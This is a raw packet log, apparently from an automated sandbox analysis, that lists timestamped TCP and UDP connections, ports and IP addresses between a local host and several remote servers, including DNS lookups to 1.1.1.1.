Dec 18, 2024 21:09:49.925470114 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:50.271150112 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:50.271193027 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:50.271318913 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:50.271353006 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:50.272186995 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:50.272221088 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:50.272233963 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:50.272236109 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:50.474123001 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:50.474184036 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:50.474293947 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:50.474546909 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:50.474565983 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.879771948 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.879905939 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.880424023 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.880440950 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882497072 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882519007 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882551908 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882563114 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882602930 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882607937 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882678986 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882694006 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882708073 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882714033 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882839918 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882859945 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.882869959 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.882875919 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:51.892493963 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:51.892517090 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:53.507657051 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:53.507760048 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:53.507766962 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:53.507833004 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:53.508039951 CET	49863	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:53.508101940 CET	443	49863	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:53.563457012 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:53.563513994 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:53.563589096 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:53.567826033 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:53.567857027 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:54.964490891 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:54.964715958 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:54.965519905 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:54.965526104 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:54.967216015 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:54.967221022 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:55.873862982 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:55.873955011 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:55.873965025 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:55.874006033 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:55.874294043 CET	49869	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:55.874310017 CET	443	49869	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:55.875996113 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:55.876024961 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:55.876101017 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:55.876447916 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:55.876462936 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:56.216401100 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:56.216537952 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:56.216766119 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:56.418965101 CET	443	49817	23.206.229.209	192.168.2.9
Dec 18, 2024 21:09:56.420202017 CET	49817	443	192.168.2.9	23.206.229.209
Dec 18, 2024 21:09:56.565327883 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:56.565428019 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:56.565524101 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:57.296477079 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:57.296597958 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:57.297211885 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:57.297219038 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:57.299704075 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:57.299709082 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:57.581057072 CET	49816	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:57.581073999 CET	443	49816	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:57.581299067 CET	49818	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:57.581304073 CET	443	49818	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:58.202688932 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:58.202753067 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:58.202780008 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:58.202796936 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:58.202820063 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:58.202847958 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:58.203006983 CET	49871	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:58.203022957 CET	443	49871	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:59.882740974 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:59.882822990 CET	443	49839	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:59.883255005 CET	49839	443	192.168.2.9	23.44.203.90
Dec 18, 2024 21:09:59.890314102 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:59.890383959 CET	443	49838	23.44.203.90	192.168.2.9
Dec 18, 2024 21:09:59.890441895 CET	49838	443	192.168.2.9	23.44.203.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 21:08:11.086010933 CET	63796	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:08:11.317584038 CET	53	63796	1.1.1.1	192.168.2.9
Dec 18, 2024 21:08:40.035507917 CET	49420	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:08:40.172312021 CET	53	49420	1.1.1.1	192.168.2.9
Dec 18, 2024 21:08:42.194142103 CET	54693	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:08:42.512206078 CET	53	54693	1.1.1.1	192.168.2.9
Dec 18, 2024 21:08:54.458820105 CET	138	138	192.168.2.9	192.168.2.255
Dec 18, 2024 21:08:59.601164103 CET	53	62114	1.1.1.1	192.168.2.9
Dec 18, 2024 21:08:59.696238041 CET	53	56452	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:00.877876043 CET	55182	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:00.878009081 CET	50882	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:01.014942884 CET	53	55182	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:01.015243053 CET	53	50882	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:02.424933910 CET	53	62132	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:04.714346886 CET	53	54666	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:04.892967939 CET	53	49943	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:24.620562077 CET	59697	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:24.620691061 CET	54282	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:24.758337021 CET	53	54282	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:27.149636984 CET	56828	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:27.149946928 CET	57109	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:27.516293049 CET	64042	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:27.516642094 CET	59570	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:27.655468941 CET	53	64042	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:27.746397018 CET	53	59570	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.112540007 CET	50076	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.112701893 CET	57289	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.113120079 CET	52742	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.113295078 CET	59779	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.123300076 CET	62522	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.123604059 CET	62763	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.249686003 CET	53	50076	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.249703884 CET	53	52742	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.250144958 CET	53	57289	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.250180960 CET	53	59779	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.261018991 CET	53	62763	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.261030912 CET	53	62522	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.840636969 CET	50694	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.840783119 CET	52816	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.856262922 CET	53552	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.856477022 CET	55986	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.921120882 CET	53321	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.921457052 CET	64383	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.977490902 CET	53	50694	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.977518082 CET	53	52816	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:29.985615015 CET	55234	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:29.986011028 CET	55797	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:30.120973110 CET	50140	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:30.121129036 CET	61523	53	192.168.2.9	1.1.1.1
Dec 18, 2024 21:09:30.123713017 CET	53	55797	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:30.260081053 CET	53	61523	1.1.1.1	192.168.2.9
Dec 18, 2024 21:09:31.837975025 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.139000893 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.731698036 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.752263069 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.924809933 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.924989939 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.926368952 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.926532984 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.926681042 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.927043915 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.928441048 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.940506935 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.035000086 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.072107077 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.243295908 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.244049072 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.244059086 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.244066954 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.244214058 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.244292021 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.267581940 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.269414902 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.269753933 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.270059109 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.640650034 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.706953049 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.733309984 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.821944952 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.824187994 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.824203968 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.824214935 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.824517965 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.825059891 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.826313019 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.829807043 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.238770008 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.304331064 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.304361105 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.304377079 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.304393053 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.304420948 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.304828882 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.304913044 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.305358887 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.316745996 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.317084074 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:34.629062891 CET	443	63329	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:34.659033060 CET	63329	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:35.061140060 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:35.061436892 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:35.083787918 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:35.084532976 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:35.377198935 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:35.378686905 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:35.378726006 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:35.379062891 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:35.380172014 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:35.380383015 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:35.399632931 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:35.401535988 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:35.401787043 CET	443	65482	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:35.402261019 CET	65482	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:35.689279079 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:35.689872026 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.298743963 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.298953056 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.474289894 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.474577904 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.475241899 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.475454092 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.475730896 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.476073027 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.476093054 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.477230072 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.477246046 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.477261066 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.477957964 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.479829073 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.480463982 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.480591059 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.481520891 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.481961966 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.482702017 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.483223915 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.483249903 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.483272076 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.618164062 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.618335009 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.618484020 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.618763924 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.797208071 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.797228098 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.797240019 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.797252893 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.797266006 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.797673941 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.797950029 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.819104910 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.831397057 CET	59490	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.845037937 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.845076084 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.845144987 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.845313072 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.845341921 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.845370054 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.845544100 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.845731974 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.850377083 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.850441933 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.850786924 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.880892038 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.899255037 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.899610996 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.905620098 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.914026976 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.914237976 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.922391891 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.930861950 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.931094885 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.932934046 CET	443	59490	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.933001041 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.945831060 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.948959112 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.949433088 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.957075119 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.965915918 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.966129065 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.974056959 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.982772112 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.983035088 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:36.991103888 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.999684095 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:36.999954939 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.008138895 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.016841888 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.017138958 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.025188923 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.034491062 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.035535097 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.043410063 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.063623905 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.063803911 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.064508915 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.068491936 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.068715096 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.076883078 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.085575104 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.085793018 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.093841076 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.102339029 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.102576971 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.111253977 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.143460035 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.154556036 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.154786110 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.154820919 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.155399084 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.156687021 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.156954050 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.156970024 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.163117886 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.163362980 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.167788982 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.172883987 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.180286884 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.180530071 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.189153910 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.197110891 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.197536945 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.206402063 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.239089966 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.243953943 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.244129896 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.244164944 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.244324923 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.244713068 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.244888067 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.255862951 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.256360054 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.256534100 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.265383959 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.273823023 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.274002075 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.281900883 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.290489912 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.290730000 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.299824953 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.308928967 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.310102940 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.316654921 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.325257063 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.325481892 CET	62192	443	192.168.2.9	23.44.203.15
Dec 18, 2024 21:09:37.334378004 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.343055010 CET	443	62192	23.44.203.15	192.168.2.9
Dec 18, 2024 21:09:37.343372107 CET	62192	443	192.168.2.9	23.44.203.15
